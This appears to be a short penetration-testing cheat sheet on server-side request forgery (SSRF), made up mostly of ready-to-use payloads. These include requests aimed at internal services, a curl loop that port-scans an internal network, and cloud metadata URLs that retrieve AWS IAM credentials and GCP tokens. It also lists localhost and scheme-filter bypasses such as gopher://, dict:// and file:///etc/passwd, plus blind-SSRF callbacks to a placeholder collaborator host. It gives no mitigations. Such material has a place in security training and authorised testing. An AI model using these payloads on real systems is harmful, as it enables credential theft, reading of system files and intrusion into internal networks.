What is SSRF?
Server-Side Request Forgery (SSRF) occurs when you can make the server issue HTTP requests to destinations you specify. The server fetches the URL you provide โ giving you access to services only reachable from the server itself: internal APIs, admin panels, cloud metadata endpoints, and local services that reject external connections.
Basic Exploitation
# The vulnerable parameter:
GET /api/fetch?url=https://external.com HTTP/1.1
# Redirect it at internal services:
GET /api/fetch?url=http://localhost:8080/admin
GET /api/fetch?url=http://192.168.1.1/
GET /api/fetch?url=http://10.0.0.1:6379/ # Redis
# Port scan the internal network
for port in 22 80 443 6379 5432 3306 8080 8443; do
curl "https://vuln.site/fetch?url=http://192.168.1.100:$port" 2>&1
done
Cloud Metadata Exploitation
# AWS IMDSv1 โ highest value target
GET /fetch?url=http://169.254.169.254/latest/meta-data/
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# GCP Metadata
GET /fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure IMDS
GET /fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01
Bypass Techniques
# Bypass blacklist of 127.0.0.1
http://2130706433/ # decimal encoding
http://0x7f000001/ # hexadecimal encoding
http://[::1]/ # IPv6 localhost
http://127.1/ # shorthand notation
# Bypass http:// scheme filter
dict://127.0.0.1:6379/INFO # Redis via dict protocol
gopher://127.0.0.1:6379/_INFO # Redis via Gopher protocol
file:///etc/passwd # file:// protocol
Blind SSRF Detection
# Use Burp Collaborator or interactsh for out-of-band callbacks
GET /fetch?url=https://YOUR.burpcollaborator.net/ssrf-test
# Open-source interactsh
interactsh-client -v
# Use your generated .interact.sh subdomain as the callback URL